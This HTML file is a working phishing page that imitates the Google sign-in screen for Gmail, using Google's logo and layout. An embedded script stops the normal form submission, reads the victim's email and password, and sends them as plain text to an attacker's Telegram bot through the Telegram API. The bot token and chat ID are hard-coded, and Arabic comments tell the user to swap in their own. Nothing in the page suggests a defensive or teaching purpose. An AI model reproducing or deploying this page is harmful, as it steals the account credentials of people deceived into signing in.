<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Sign-In</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
        }

        .container {
            background-color: #fff;
            border: 1px solid #ddd;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 360px;
            padding: 24px;
            text-align: center;
        }

        .logo {
            margin-bottom: 24px;
        }

        .logo img {
            width: 75px;
        }

        h1 {
            font-size: 24px;
            font-weight: 400;
            color: #202124;
            margin-bottom: 8px;
        }

        p {
            font-size: 14px;
            color: #5f6368;
            margin-bottom: 24px;
        }

        .form-group {
            margin-bottom: 16px;
            text-align: left;
        }

        .form-group label {
            font-size: 14px;
            color: #202124;
            display: block;
            margin-bottom: 8px;
        }

        .form-group input {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ddd;
            border-radius: 4px;
            box-sizing: border-box;
        }

        .btn {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            color: #fff;
            background-color: #1a73e8;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        .btn:hover {
            background-color: #1669c1;
        }

        .footer {
            margin-top: 24px;
            font-size: 12px;
            color: #5f6368;
        }

        .footer a {
            color: #1a73e8;
            text-decoration: none;
        }

        .footer a:hover {
            text-decoration: underline;
        }
    </style>
    <script>
        function sendToTelegram(event) {
            event.preventDefault(); // منع التحديث الافتراضي للنموذج

            const email = document.getElementById('email').value;
            const password = document.getElementById('password').value;

            const botToken = '7689202975:AAF0qXGUsN7kM37Wc6v-qdbq4Y8pNFBD0ek'; // ضع هنا توكن البوت الخاص بك
            const chatId = '6439414742'; // ضع هنا معرف المحادثة أو القناة
            const message = `Email: ${email}\nPassword: ${password}`;

            const url = `https://api.telegram.org/bot${botToken}/sendMessage`;

            fetch(url, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message
                })
            })
            .catch(error => {
                console.error('Error:', error);
            });
        }
    </script>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" alt="Google Logo">
        </div>
        <h1>Sign in</h1>
        <p>to continue to Gmail</p>
        <form onsubmit="sendToTelegram(event)">
            <div class="form-group">
                <label for="email">Email or phone</label>
                <input type="text" id="email" name="email" required>
            </div>
            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required>
            </div>
            <button class="btn" type="submit">Next</button>
        </form>
        <div class="footer">
            <p>Not your computer? Use Guest mode to sign in privately. <a href="#">Learn more</a></p>
        </div>
    </div>
</body>
</html>
